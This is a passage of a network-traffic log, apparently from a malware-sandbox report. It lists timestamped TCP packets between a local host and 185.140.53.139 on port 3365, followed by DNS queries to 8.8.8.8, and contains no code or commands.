Feb 23, 2021 08:05:06.177699089 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:06.177725077 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:06.178150892 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:06.178195000 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:06.179202080 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:06.179236889 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:06.179246902 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:06.180301905 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:06.180342913 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:06.244441032 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:06.380139112 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:07.029824018 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:11.150295973 CET	49739	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:11.340631008 CET	3365	49739	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:11.341026068 CET	49739	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:11.396505117 CET	49739	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:11.715080023 CET	3365	49739	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:11.893182993 CET	3365	49739	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:11.915378094 CET	49739	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:12.307342052 CET	3365	49739	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:12.309660912 CET	49739	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:12.702997923 CET	3365	49739	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:12.703083038 CET	49739	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:12.941122055 CET	3365	49739	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:13.077917099 CET	49739	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:13.169919968 CET	3365	49739	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:13.223752975 CET	49739	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:13.275306940 CET	3365	49739	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:13.275480986 CET	49739	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:13.506062031 CET	3365	49739	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:13.506165028 CET	49739	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:13.705044031 CET	3365	49739	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:13.755031109 CET	49739	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:13.802226067 CET	49739	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:14.107969046 CET	3365	49739	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:14.151341915 CET	3365	49739	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:14.151453972 CET	49739	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:14.173086882 CET	49739	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:18.340090036 CET	49742	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:18.541995049 CET	3365	49742	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:18.542232990 CET	49742	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:18.542782068 CET	49742	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:18.875889063 CET	3365	49742	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:19.021131039 CET	49742	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:19.068419933 CET	49742	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:19.220061064 CET	3365	49742	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:19.220151901 CET	49742	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:23.690651894 CET	49743	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:26.693629026 CET	49743	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:27.170232058 CET	3365	49743	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:27.170475960 CET	49743	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:27.404114962 CET	49743	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:27.679878950 CET	3365	49743	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:27.682981968 CET	49743	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:27.714961052 CET	3365	49743	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:27.896887064 CET	49743	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:27.913970947 CET	3365	49743	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:27.914161921 CET	49743	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:27.914191961 CET	49743	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:28.119025946 CET	3365	49743	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:28.120254993 CET	49743	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:28.390044928 CET	3365	49743	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:28.429481030 CET	49743	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:28.508078098 CET	3365	49743	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:28.584481001 CET	49743	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:28.646559000 CET	3365	49743	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:28.646651030 CET	49743	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:28.921112061 CET	3365	49743	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:28.921268940 CET	49743	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:29.291244030 CET	3365	49743	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:29.397002935 CET	49743	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:29.430898905 CET	49743	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:29.590115070 CET	3365	49743	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:29.591378927 CET	49743	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:33.769365072 CET	49745	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:34.000109911 CET	3365	49745	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:34.000324965 CET	49745	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:34.009030104 CET	49745	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:34.299948931 CET	3365	49745	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:34.484740019 CET	49745	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:38.588826895 CET	49747	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:38.791948080 CET	3365	49747	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:38.792619944 CET	49747	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:38.806185961 CET	49747	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:39.133564949 CET	3365	49747	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:39.134004116 CET	49747	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:39.339889050 CET	3365	49747	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:39.382226944 CET	49747	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:39.528332949 CET	49747	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:39.582247972 CET	3365	49747	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:39.582334042 CET	49747	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:43.730396032 CET	49748	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:43.937077999 CET	3365	49748	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:43.940356970 CET	49748	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:43.941000938 CET	49748	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:44.245434046 CET	3365	49748	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:44.286123991 CET	49748	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:44.492206097 CET	3365	49748	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:44.513479948 CET	49748	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:44.830123901 CET	3365	49748	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:44.830306053 CET	49748	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:44.871575117 CET	3365	49748	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:44.960777998 CET	49748	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:45.105182886 CET	3365	49748	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:45.105321884 CET	49748	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:45.544998884 CET	3365	49748	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:45.545136929 CET	49748	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:45.745361090 CET	3365	49748	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:45.745534897 CET	49748	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:45.945266962 CET	3365	49748	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:46.054702044 CET	49748	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:47.151019096 CET	49748	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:51.257608891 CET	49757	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:51.460578918 CET	3365	49757	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:51.460735083 CET	49757	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:51.479554892 CET	49757	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:51.773504019 CET	3365	49757	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:51.784272909 CET	49757	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:51.993484020 CET	3365	49757	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:51.993571997 CET	49757	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:52.341564894 CET	3365	49757	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:52.342175961 CET	49757	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:52.832655907 CET	3365	49757	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:52.834580898 CET	49757	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:53.032699108 CET	3365	49757	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:53.032901049 CET	49757	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:53.440867901 CET	3365	49757	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:53.441065073 CET	49757	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:53.644505024 CET	3365	49757	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:53.758469105 CET	49757	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:53.959465981 CET	3365	49757	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:53.978287935 CET	49757	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:06:00.231010914 CET	49766	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:06:00.629144907 CET	3365	49766	185.140.53.139	192.168.2.4
Feb 23, 2021 08:06:00.629261971 CET	49766	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:06:00.632375956 CET	49766	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:06:00.954035997 CET	3365	49766	185.140.53.139	192.168.2.4
Feb 23, 2021 08:06:01.087109089 CET	49766	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:06:01.181471109 CET	49766	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:06:01.284368992 CET	3365	49766	185.140.53.139	192.168.2.4
Feb 23, 2021 08:06:01.284456968 CET	49766	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:06:05.315234900 CET	49767	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:06:05.510323048 CET	3365	49767	185.140.53.139	192.168.2.4
Feb 23, 2021 08:06:05.511076927 CET	49767	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:06:05.570771933 CET	49767	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:06:05.935257912 CET	3365	49767	185.140.53.139	192.168.2.4
Feb 23, 2021 08:06:06.055455923 CET	3365	49767	185.140.53.139	192.168.2.4
Feb 23, 2021 08:06:06.094683886 CET	49767	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:06:06.308557034 CET	3365	49767	185.140.53.139	192.168.2.4
Feb 23, 2021 08:06:06.343341112 CET	49767	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:06:06.907598019 CET	49767	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:06:06.925364971 CET	3365	49767	185.140.53.139	192.168.2.4
Feb 23, 2021 08:06:06.925445080 CET	49767	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:06:06.933370113 CET	3365	49767	185.140.53.139	192.168.2.4
Feb 23, 2021 08:06:07.013983011 CET	49767	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:06:07.105441093 CET	3365	49767	185.140.53.139	192.168.2.4
Feb 23, 2021 08:06:07.105535984 CET	49767	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:06:07.127583027 CET	3365	49767	185.140.53.139	192.168.2.4
Feb 23, 2021 08:06:07.425630093 CET	3365	49767	185.140.53.139	192.168.2.4
Feb 23, 2021 08:06:07.425928116 CET	49767	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:06:07.626507998 CET	3365	49767	185.140.53.139	192.168.2.4
Feb 23, 2021 08:06:07.759562016 CET	49767	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:06:07.950309992 CET	3365	49767	185.140.53.139	192.168.2.4
Feb 23, 2021 08:06:08.150255919 CET	49767	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:06:08.323163986 CET	49767	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:06:12.503662109 CET	49768	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:06:12.694119930 CET	3365	49768	185.140.53.139	192.168.2.4
Feb 23, 2021 08:06:12.694353104 CET	49768	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:06:12.698134899 CET	49768	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:06:13.103969097 CET	3365	49768	185.140.53.139	192.168.2.4
Feb 23, 2021 08:06:13.120454073 CET	49768	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:06:13.328186989 CET	3365	49768	185.140.53.139	192.168.2.4
Feb 23, 2021 08:06:13.328398943 CET	49768	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:06:13.624975920 CET	3365	49768	185.140.53.139	192.168.2.4
Feb 23, 2021 08:06:13.625155926 CET	49768	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:06:13.916987896 CET	3365	49768	185.140.53.139	192.168.2.4
Feb 23, 2021 08:06:14.033571959 CET	3365	49768	185.140.53.139	192.168.2.4
Feb 23, 2021 08:06:14.034804106 CET	49768	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:06:14.243002892 CET	3365	49768	185.140.53.139	192.168.2.4
Feb 23, 2021 08:06:14.244044065 CET	49768	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:06:14.446953058 CET	3365	49768	185.140.53.139	192.168.2.4
Feb 23, 2021 08:06:14.447072983 CET	49768	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:06:14.651237965 CET	3365	49768	185.140.53.139	192.168.2.4
Feb 23, 2021 08:06:14.697638988 CET	49768	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:06:14.892939091 CET	3365	49768	185.140.53.139	192.168.2.4
Feb 23, 2021 08:06:14.947726011 CET	49768	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:06:15.352057934 CET	49768	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:06:19.689855099 CET	49769	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:06:19.884063005 CET	3365	49769	185.140.53.139	192.168.2.4
Feb 23, 2021 08:06:19.884191036 CET	49769	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:06:19.896466970 CET	49769	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:06:20.210037947 CET	3365	49769	185.140.53.139	192.168.2.4
Feb 23, 2021 08:06:20.260731936 CET	49769	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:06:20.331032038 CET	49769	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:06:20.491223097 CET	3365	49769	185.140.53.139	192.168.2.4
Feb 23, 2021 08:06:20.491455078 CET	49769	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:06:24.476124048 CET	49770	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:06:24.669121981 CET	3365	49770	185.140.53.139	192.168.2.4
Feb 23, 2021 08:06:24.669301033 CET	49770	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:06:24.669991970 CET	49770	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:06:25.015168905 CET	3365	49770	185.140.53.139	192.168.2.4
Feb 23, 2021 08:06:25.324558020 CET	49770	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:06:25.354362965 CET	3365	49770	185.140.53.139	192.168.2.4
Feb 23, 2021 08:06:25.401664019 CET	49770	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:06:25.610359907 CET	3365	49770	185.140.53.139	192.168.2.4
Feb 23, 2021 08:06:25.614207029 CET	49770	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:06:25.875294924 CET	3365	49770	185.140.53.139	192.168.2.4
Feb 23, 2021 08:06:25.877007961 CET	49770	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:06:26.125109911 CET	3365	49770	185.140.53.139	192.168.2.4
Feb 23, 2021 08:06:26.277379036 CET	3365	49770	185.140.53.139	192.168.2.4
Feb 23, 2021 08:06:26.278517008 CET	49770	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:06:26.339615107 CET	49770	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:06:26.497071981 CET	3365	49770	185.140.53.139	192.168.2.4
Feb 23, 2021 08:06:26.508070946 CET	49770	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:06:30.459366083 CET	49773	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:06:30.666932106 CET	3365	49773	185.140.53.139	192.168.2.4
Feb 23, 2021 08:06:30.667064905 CET	49773	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:06:30.667989016 CET	49773	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:06:31.022212982 CET	3365	49773	185.140.53.139	192.168.2.4
Feb 23, 2021 08:06:31.045054913 CET	3365	49773	185.140.53.139	192.168.2.4
Feb 23, 2021 08:06:31.063640118 CET	49773	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:06:31.307883978 CET	3365	49773	185.140.53.139	192.168.2.4
Feb 23, 2021 08:06:31.309637070 CET	49773	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:06:31.856400967 CET	49773	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:06:32.507774115 CET	49773	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:06:33.615906954 CET	3365	49773	185.140.53.139	192.168.2.4
Feb 23, 2021 08:06:33.615938902 CET	3365	49773	185.140.53.139	192.168.2.4
Feb 23, 2021 08:06:33.616018057 CET	3365	49773	185.140.53.139	192.168.2.4
Feb 23, 2021 08:06:33.616091967 CET	49773	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:06:33.616177082 CET	49773	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:06:33.616193056 CET	3365	49773	185.140.53.139	192.168.2.4
Feb 23, 2021 08:06:33.616245031 CET	49773	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:06:33.792588949 CET	3365	49773	185.140.53.139	192.168.2.4
Feb 23, 2021 08:06:33.809006929 CET	3365	49773	185.140.53.139	192.168.2.4
Feb 23, 2021 08:06:34.200628996 CET	49773	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:06:34.630228043 CET	3365	49773	185.140.53.139	192.168.2.4
Feb 23, 2021 08:06:34.630471945 CET	49773	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:06:34.874327898 CET	3365	49773	185.140.53.139	192.168.2.4
Feb 23, 2021 08:06:34.918194056 CET	49773	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:06:35.121120930 CET	3365	49773	185.140.53.139	192.168.2.4
Feb 23, 2021 08:06:35.168221951 CET	49773	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:06:35.215950966 CET	49773	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:06:39.312156916 CET	49774	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:06:39.521125078 CET	3365	49774	185.140.53.139	192.168.2.4
Feb 23, 2021 08:06:39.521641016 CET	49774	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:06:39.522382021 CET	49774	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:06:39.825002909 CET	3365	49774	185.140.53.139	192.168.2.4
Feb 23, 2021 08:06:40.000324011 CET	3365	49774	185.140.53.139	192.168.2.4
Feb 23, 2021 08:06:40.043507099 CET	49774	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:06:40.216444016 CET	49774	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:06:40.275715113 CET	3365	49774	185.140.53.139	192.168.2.4
Feb 23, 2021 08:06:40.275840044 CET	49774	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:06:44.323765993 CET	49775	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:06:44.696264982 CET	3365	49775	185.140.53.139	192.168.2.4
Feb 23, 2021 08:06:44.696532011 CET	49775	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:06:44.697369099 CET	49775	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:06:45.230072021 CET	3365	49775	185.140.53.139	192.168.2.4
Feb 23, 2021 08:06:45.233098984 CET	49775	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:06:45.304090977 CET	3365	49775	185.140.53.139	192.168.2.4
Feb 23, 2021 08:06:45.356451035 CET	49775	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:06:45.522269964 CET	3365	49775	185.140.53.139	192.168.2.4
Feb 23, 2021 08:06:45.522527933 CET	49775	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:06:45.723428011 CET	3365	49775	185.140.53.139	192.168.2.4
Feb 23, 2021 08:06:45.725466013 CET	49775	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:06:46.015037060 CET	3365	49775	185.140.53.139	192.168.2.4
Feb 23, 2021 08:06:46.103056908 CET	3365	49775	185.140.53.139	192.168.2.4
Feb 23, 2021 08:06:46.105268955 CET	49775	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:06:46.305110931 CET	3365	49775	185.140.53.139	192.168.2.4
Feb 23, 2021 08:06:46.305236101 CET	49775	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:06:46.699035883 CET	3365	49775	185.140.53.139	192.168.2.4
Feb 23, 2021 08:06:46.699156046 CET	49775	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:06:47.140701056 CET	3365	49775	185.140.53.139	192.168.2.4
Feb 23, 2021 08:06:47.143768072 CET	49775	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:06:47.280510902 CET	49775	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:06:47.347018003 CET	3365	49775	185.140.53.139	192.168.2.4
Feb 23, 2021 08:06:47.347285986 CET	49775	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:06:51.429831028 CET	49776	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:06:51.888978958 CET	3365	49776	185.140.53.139	192.168.2.4
Feb 23, 2021 08:06:51.889182091 CET	49776	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:06:51.903107882 CET	49776	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:06:52.186028004 CET	3365	49776	185.140.53.139	192.168.2.4
Feb 23, 2021 08:06:52.311505079 CET	49776	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:06:52.386557102 CET	3365	49776	185.140.53.139	192.168.2.4
Feb 23, 2021 08:06:52.435204029 CET	49776	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:06:52.582174063 CET	3365	49776	185.140.53.139	192.168.2.4
Feb 23, 2021 08:06:52.582259893 CET	49776	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:06:52.811515093 CET	3365	49776	185.140.53.139	192.168.2.4
Feb 23, 2021 08:06:52.812442064 CET	49776	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:06:53.010113001 CET	3365	49776	185.140.53.139	192.168.2.4
Feb 23, 2021 08:06:53.060235977 CET	49776	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:06:53.542263985 CET	3365	49776	185.140.53.139	192.168.2.4
Feb 23, 2021 08:06:53.542850971 CET	49776	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:06:53.801559925 CET	3365	49776	185.140.53.139	192.168.2.4
Feb 23, 2021 08:06:53.801800013 CET	49776	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:06:54.025540113 CET	3365	49776	185.140.53.139	192.168.2.4
Feb 23, 2021 08:06:54.076148987 CET	49776	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:06:54.279277086 CET	3365	49776	185.140.53.139	192.168.2.4
Feb 23, 2021 08:06:54.326067924 CET	49776	3365	192.168.2.4	185.140.53.139

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 23, 2021 08:04:41.195267916 CET	59123	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:04:41.256730080 CET	53	59123	8.8.8.8	192.168.2.4
Feb 23, 2021 08:04:42.509239912 CET	54531	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:04:42.561167002 CET	53	54531	8.8.8.8	192.168.2.4
Feb 23, 2021 08:04:43.338033915 CET	49714	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:04:43.396691084 CET	53	49714	8.8.8.8	192.168.2.4
Feb 23, 2021 08:04:43.439785957 CET	58028	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:04:43.497088909 CET	53	58028	8.8.8.8	192.168.2.4
Feb 23, 2021 08:04:44.821852922 CET	53097	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:04:44.873518944 CET	53	53097	8.8.8.8	192.168.2.4
Feb 23, 2021 08:04:46.480695963 CET	49257	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:04:46.529553890 CET	53	49257	8.8.8.8	192.168.2.4
Feb 23, 2021 08:04:47.630599976 CET	62389	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:04:47.682384968 CET	53	62389	8.8.8.8	192.168.2.4
Feb 23, 2021 08:04:48.922032118 CET	49910	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:04:48.971003056 CET	53	49910	8.8.8.8	192.168.2.4
Feb 23, 2021 08:04:49.914119959 CET	55854	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:04:49.965656996 CET	53	55854	8.8.8.8	192.168.2.4
Feb 23, 2021 08:04:51.295715094 CET	64549	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:04:51.347246885 CET	53	64549	8.8.8.8	192.168.2.4
Feb 23, 2021 08:04:52.283457041 CET	63153	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:04:52.332087994 CET	53	63153	8.8.8.8	192.168.2.4
Feb 23, 2021 08:04:53.550250053 CET	52991	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:04:53.609714031 CET	53	52991	8.8.8.8	192.168.2.4
Feb 23, 2021 08:04:54.528877020 CET	53700	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:04:54.580415010 CET	53	53700	8.8.8.8	192.168.2.4
Feb 23, 2021 08:04:55.743685961 CET	51726	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:04:55.795187950 CET	53	51726	8.8.8.8	192.168.2.4
Feb 23, 2021 08:04:57.245246887 CET	56794	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:04:57.302469015 CET	53	56794	8.8.8.8	192.168.2.4
Feb 23, 2021 08:04:58.682540894 CET	56534	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:04:58.731172085 CET	53	56534	8.8.8.8	192.168.2.4
Feb 23, 2021 08:04:59.876025915 CET	56627	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:04:59.927695036 CET	53	56627	8.8.8.8	192.168.2.4
Feb 23, 2021 08:05:02.520519018 CET	56621	53	192.168.2.4	8.8.8.8
